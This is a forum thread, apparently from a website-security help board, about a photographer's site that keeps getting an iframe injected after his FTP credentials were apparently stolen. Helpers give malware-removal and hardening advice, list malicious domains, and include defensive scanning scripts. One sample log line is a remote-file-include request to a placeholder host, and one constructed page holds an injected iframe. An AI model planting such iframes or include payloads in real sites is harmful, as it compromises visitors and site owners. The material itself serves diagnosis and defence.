Iframe Injection
by Organophosphate
8 months ago

Hello all,
I’m having a problem with an IFRAME injection. I didn’t even know these existed until this week so I apologise for any silly noob assumptions/mistakes on my part.

I run a small website to showcase my photography. Nothing flashy. It contains some PHP to act as a feedreader for my blog (using MagpieRSS) and also to generate some random quotes in the footer. It contains some javascript for Google Analytics and also Google Ads. Other than this it’s a mix of XHTML and CSS.

Anyway, on with the problem! Earlier this week I did an FTP upload using Filezilla. The next day I checked my site online and noticed that the layout was looking a bit off, there was some padding of about 200px at the top of the screen.
My first thought was that I’d mistyped some CSS which was messing with a height property but it actually turned out to be an IFRAME in the HTML of my index page.
After some further reading I figured out I’d been attacked with some badware. Joy.

So, I did a full virus scan of my home computer (using AVG), I then changed my FTP password to a nice strong upper case/lower case/alpha/numeric mix and re-uploaded my site from my home computer. I also made sure Filezilla wasn’t storing my password anymore as it had done previously.

Today another IFRAME has appeared!

Could one of you fine people inform me of the best way to clean up my site?

I have contacted my hosting company for help (Fasthosts.co.uk), they have told me they don’t deal with CSS issues(!?!?).

For reference, my site is www.ambientbuzzsaw.co.uk and the IFRAME only seems to be appearing on the index page.

Many thanks in advance for your help!

by WeWatch
8 months ago

We’ve had good results with AVG but you might want to also try Malwarebytes.

Reading the sequence of events, it does seem like it’s some local PC infection stealing your FTP credentials. It’s not just that they’re (cybercriminals – I prefer the term hackers, but many don’t) stealing stored passwords, we’ve seen instances where the infection (virus/trojan/worm) is “sniffing” the FTP credentials. Since FTP transmits all data in plain text, it’s easy for them to capture your username, password and destination, send it to a server and then run an automated script to inject their code into your webpage.

Ask Fasthosts.co.uk about how you could switch from FTP to either SFTP or FTPS. Then your login credentials are much more difficult to sniff as these protocols encrypt all traffic.

Please try Malwarebytes and then contact your hosting provider about switching protocols.

Keep the forum here posted on your results/updates so everyone can learn from your experience. Much as you turned to the forum here for help, others do as well.

Thank you.

Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com

by Organophosphate
8 months ago

Thank you for the advice Thomas, I had no idea that FTP was so insecure. I kind of expected everything to be encrypted, a dangerous presumption!

Going on your advice, I think my next steps are:

-Take my site down

-Perform another system scan of my PC with AVG and Malwarebytes.

-Await a response from Fasthosts and enquire about switching to a more secure FTP protocol.

-Change passwords again to be safe.

-Re-upload and hope for the best.

Thanks once again for your advice, I’ll keep you posted on my progress. I’m currently waiting for a reply from my last email to Fasthosts where I told them in no uncertain terms that this was not a CSS issue.

by WeWatch
8 months ago

We once had a hosting provider tell us that the problem our client was having was due to an html error and they can’t be expected to be html experts. This was after we scanned 832 websites on the same shared hosting server as our client and found all of them had the same infection. Coincidence? I think not.

In the defense of hosting providers though, I know they’re being squeezed. On one hand they have to lower monthly fees in order to compete. On the other hand they have to provide as much technical support as they possibly can.

Just my opinion.

Please keep the forum informed on your findings/progress.

Thank you.

Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com

by robertmoore
8 months ago

Recently dealing with a similar issue.

A few different things on this..

One, it appears to affect older WordPress installs.
It’s also a link injection that appends code to the end of files specifically named index.php.

It also looks for body tags and appends a line at that level.

It is a link injection, meaning they don’t have FTP or root access to the site.

We are still investigating this issue and as more information is available we will post it for you.

Added…

Couple of things to note..

The website that it tries to shoot you to, and its registration information:

Domain Name: shopmovielife.cn
ROID: 20081007s10001s46382980-cn
Domain Status: clientTransferProhibited
Registrant Organization: Scott Bell
Registrant Name: Scott Bell
Administrative Email:
Sponsoring Registrar: 广东时代互联科技有限公司
Name Server:ns1.freednshostway.com
Name Server:ns2.freednshostway.com
Registration Date: 2008-10-07 04:53
Expiration Date: 2009-10-07 04:53

Then freednshostway.com [their possible provider]:
Registry Data
ICANN Registrar: ONLINENIC, INC.
Created: 2009-02-19
Expires: 2010-02-19
Updated: 2009-05-10
Registrar Status: ok
Name Server: NS1.FREEDNSHOSTWAY.COM (has 3 domains)
Name Server: NS2.FREEDNSHOSTWAY.COM (has 3 domains)
Whois Server: whois.onlinenic.com

Server Data
IP Address: 95.129.144.210
IP Location – United Kingdom – Ventrex Llp Customers
Domain Status: Registered And Active Website

FreeDNShostway seems bogus; odds are it’s just a web front to catch abuse emails before sending them to the actual provider.

The owner of the last recorded IP for that server is:

OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: P.O. Box 10096
City: Amsterdam
StateProv:
PostalCode: 1001EB
Country: NL


Also we already submitted an abuse report to them.
-------------------------------------------------------------
Robert Moore
Senior Technician
Digital Insights
http://www.digitalinsights.biz
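A small scanner for the symptom described in this thread (an iframe injected right after the body tag or appended at the end of index.php), written here as an added example rather than anything the poster or his company uses; the sample page and the host it points at are constructed placeholders, and the site hostname passed as own_hosts is whatever the person running it owns:

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# Injected iframes usually sit right after the <body> tag or at the very end of
# index.php/index.html and point at a host that is not the site's own.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
BODY_RE = re.compile(r"<body\b[^>]*>", re.IGNORECASE)

def find_iframes(text, own_hosts=()):
    """Return [(line_no, src_host, placement)] for iframes not pointing at own_hosts."""
    findings = []
    lines = text.splitlines()
    body_line = next((i for i, l in enumerate(lines) if BODY_RE.search(l)), None)
    for i, line in enumerate(lines):
        for tag in IFRAME_RE.finditer(line):
            src = SRC_RE.search(tag.group(0))
            host = urlparse(src.group(1)).hostname if src else None
            if host in own_hosts:
                continue
            # placement: directly after <body>, within the last three lines, or elsewhere
            if body_line is not None and body_line <= i <= body_line + 1:
                placement = "after <body>"
            elif i >= len(lines) - 3:
                placement = "end of file"
            else:
                placement = "mid-file"
            findings.append((i + 1, host or "(no src)", placement))
    return findings

def scan_webroot(root, own_hosts=()):
    """Scan .php/.html/.htm files under root; return {path: findings} for files with hits."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.suffix.lower() in {".php", ".html", ".htm"}:
            hits = find_iframes(path.read_text(errors="replace"), own_hosts)
            if hits:
                report[str(path)] = hits
    return report

# Constructed sample page showing the thread's symptom: an iframe injected after
# <body>, 200px high, pointing at a placeholder host (not a real indicator).
SAMPLE = """<html><head><title>Photos</title></head>
<body>
<iframe src="http://malicious.example:8080/index.php" width="1" height="200"></iframe>
<div id="gallery">...</div>
</body></html>
"""
```

Run scan_webroot on a downloaded copy of the site (not the live server) and compare the hits against the clean copy you upload from; an iframe that is absent locally but present on the server is the injected one.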

by robertmoore
8 months ago

Two things to note from the hosting provider side.

You need to make sure these entries in the /usr/local/lib/php.ini file are disabled.
============
root@web01 [~]# grep register_globals /usr/local/lib/php.ini
register_globals = Off

root@web01 [~]# grep allow_url_fopen /usr/local/lib/php.ini
allow_url_fopen = Off
============

The lines above show you how to check.

They should be Off.


Also, the default install of mod_security prevents this attack from crossing to multiple users.
Robert Moore
Senior Technician
Digital Insights
http://www.digitalinsights.biz

by anirban
8 months ago

all good points. :-)

-A

Dr. Anirban Banerjee,
Jaal LLC, Riverside, CA.
www.stopthehacker.com
Jaal: Protecting the Internet, one website at a time™

by maxim
8 months ago

Thomas, if you come across a similar situation in the future with a hosting provider playing (or being) dumb about a mass infection, let us know. We have relationships with many hosting companies, and we also sometimes have luck using our bully pulpit to influence them to clean up.

by WeWatch
8 months ago

That’s good to know. It’s like calling in a big brother to even out a fight. Or a brother-in-law who just retired from 20 years in the Army Special Forces – I’m just sayin’.

I like it.

Thank you.

Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com

by Organophosphate
8 months ago

Quick update:
Site is now offline, currently running an AVG scan to be followed by a Malwarebytes scan. AVG is about 50% done and has already picked up 3 trojans and a HTML Framer virus. Will post the full results later today.

Still no response from Fasthosts and I have been unable to establish whether I can use SFTP/FTPS from their help files.

@RobertMoore
I’ve checked my PHP settings:

allow_url_fopen = On
register_globals = Off

My initial concern was that MagpieRSS (powers my blog page) would rely on allow_url_fopen being turned on. I’m relieved to say that this is not the case and according to their website it will function even if allow_url_fopen = Off.

Unfortunately, I’m just one man on a massive Fasthosts server so I’m guessing they won’t be letting me play with php.ini. Have gone and done some quick reading and identified that I can possibly alter settings using .htaccess:
http://www.karakas-online.de/EN-Book/htaccess-file.html
http://www.karakas-online.de/EN-Book/change-php-parameters.html
http://corz.org/serv/tricks/htaccess.php

Am I barking up the right tree here?

Oh and one other thing, not sure if it’s of any use but when this first happened (ie before my first attempt at fixing the problem) the IFRAME was pointing at the following url:

http://greatshopfilm.cn:8080/index.php

by Organophosphate
8 months ago

Turns out I have one sick computer!

AVG Results:

Trojan horse SHeur2.AKXF: Moved to Virus Vault
Trojan horse SHeur2.AKXF: Moved to Virus Vault
Trojan horse Exploit_c.AHV: Moved to Virus Vault
Virus found HTML/Framer: Moved to Virus Vault

Malwarebytes results:

Registry Keys Infected:
(Adware.MyWebSearch) → Quarantined and deleted successfully.

Registry Values Infected:
(Trojan.Agent) → Quarantined and deleted successfully.
(Trojan.FakeAlert) → Quarantined and deleted successfully.
(Trojan.FakeAlert) → Quarantined and deleted successfully.

Registry Data Items Infected:
(Broken.OpenCommand) → Bad: (“regedit.exe” “%1”) Good: (regedit.exe “%1”) → Quarantined and deleted successfully.

Files Infected:
(Trojan.DNSChanger) → Quarantined and deleted successfully.
(Trojan.Agent) → Quarantined and deleted successfully.
(Trojan.Agent) → Quarantined and deleted successfully.
(Trojan.DNSChanger) → Quarantined and deleted successfully.
(Trojan.FakeAlert) → Quarantined and deleted successfully.
(Heuristics.Malware) → Quarantined and deleted successfully.
(Malware.Trace) → Quarantined and deleted successfully.

Call me paranoid but I’m going to run another scan just to make sure…

by Organophosphate
8 months ago

Response from Fasthosts:


“Thanks for contacting us with your support enquiry.

It seems that you have been script injected by someone online entering malicious script through your site.

I recommend you take a look at the scripts and then work to a solution by removing it and making it secure to prevent it from happening in the future.”


I’ve replied and asked for information about switching to SFTP/FTPS.

by WeWatch
8 months ago

Do you have access to the logs from right before your site was infected until now?

If so, we’d like to run them through our analyzer to see what “script injection” they’re talking about.

Let us know and you can contact us off list to provide access to your logs. The clue might be in the log files.

Thank you for the update.

Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com

by Organophosphate
8 months ago

Thomas, have sent the log files to the email address in your signature.

I’ve had another response from Fasthosts saying they don’t currently offer SFTP/FTPS but that they are planning it for the future.

by WeWatch
8 months ago

Thank you.

We ran the log files through our analyzer and also inspected them manually and we see nothing that would indicate an injection attack. Just for your information, an injection would have to be delivered via an HTTP POST or via a GET if it were a remote file include. Your log files show no such action. Nothing but GETs and HEADs but no POSTs or PUTs and the GETs were for files local to your website with no extraneous query strings so it wasn’t a remote file include.

On this page: http://www.php.net/manual/en/features.remote-files.php

It states, “You can also write to files on an FTP server (provided that you have connected as a user with the correct access rights). You can only create new files using this method; if you try to overwrite a file that already exists, the fopen() call will fail.”

Again going back to compromised FTP credentials.

If you can disable allow_url_fopen then you should.

I’m curious, does your host offer SSH access to your site? That is quite odd that they wouldn’t offer SFTP or FTPS.

I’m not saying that this couldn’t be an injection attack I just wonder how people can claim that’s what it is without any proof.

If anyone can shed light on this, please enlighten me.

Thank you.

Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com
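A log triage script that applies the same reasoning as the post above (writes would arrive as POST or PUT; a remote file include would arrive as a GET whose query string carries a URL), added here as an example and not the analyzer the poster refers to; the log lines, IP addresses and hostnames are constructed placeholders:

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" access-log format, as most shared hosts produce it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
URL_PARAM = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

def classify(line):
    """Return the reasons a request could be an injection attempt, or [] if none.
    POST/PUT can carry a payload; a GET whose query parameter is itself a URL
    is the classic remote file include pattern."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable line"]
    reasons = []
    method, target = m.group("method"), m.group("target")
    if method in ("POST", "PUT"):
        reasons.append(f"{method} request to {target}")
    parts = urlsplit(target)
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if URL_PARAM.match(value):
            reasons.append(f"query parameter {key} carries a remote URL: {value}")
    return reasons

def scan_log(lines):
    """Return [(line_number, reasons)] for every suspicious line."""
    return [(i + 1, r) for i, l in enumerate(lines) if (r := classify(l))]

# Constructed sample (IPs from documentation ranges, placeholder hostnames).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jun/2009:10:01:22 +0100] "GET /index.php HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Jun/2009:10:01:23 +0100] "GET /style.css HTTP/1.1" 200 880',
    '198.51.100.7 - - [10/Jun/2009:10:05:00 +0100] "HEAD /index.php HTTP/1.0" 200 -',
    '198.51.100.9 - - [10/Jun/2009:10:07:41 +0100] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 200 5300',
    '198.51.100.9 - - [10/Jun/2009:10:08:02 +0100] "POST /index.php HTTP/1.1" 200 5300',
]

if __name__ == "__main__":
    for n, reasons in scan_log(SAMPLE_LOG):
        print(n, "; ".join(reasons))
```

A log that yields no hits from this script, like the one described above, points away from web-side injection and back towards the FTP credentials.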

by anirban
8 months ago

Thomas is right. If it were a code injection attack, albeit a rudimentary one, it would show up on your log files. And yes, it does surprise me too that your host is not suggesting ssh based access.

Is your ISP Fasthosts.co.uk? They seem to have been hacked some time back. They are one of the big guys and if they don’t offer a more secure way than vanilla FTP, it is very surprising indeed.

-A

Dr. Anirban Banerjee,
Jaal LLC, Riverside, CA.
www.stopthehacker.com
Jaal: Protecting the Internet, one website at a time™

by Organophosphate
8 months ago

Thomas – Thank you for looking at my log files and for your feedback. As I mentioned in my initial post, this is all a bit new to me! So am I right in thinking that (in layman’s terms) an ‘injection’ is an attack where they get the server to run a malicious PHP script but in my case I’ve just had my FTP log-in details stolen by one of the many, many trojans on my computer?

At any rate, I’ll take your advice and do some more research into how I can turn off allow_url_fopen via .htaccess and hopefully that’ll improve my security.

Anirban – Fasthosts.co.uk host my site, I queried them specifically about SFTP and FTPS as alternatives to straight up FTP, I’ve pasted their response below:

“Thanks for contacting us with your support enquiry.

Unfortunately not as this is not something we currently have in place.

However, in future we are considering these as an improvement.

Regards

Thanks again for contacting us.”

by wavepoint
3 months ago
Message removed due to a violation of the StopBadware terms of use.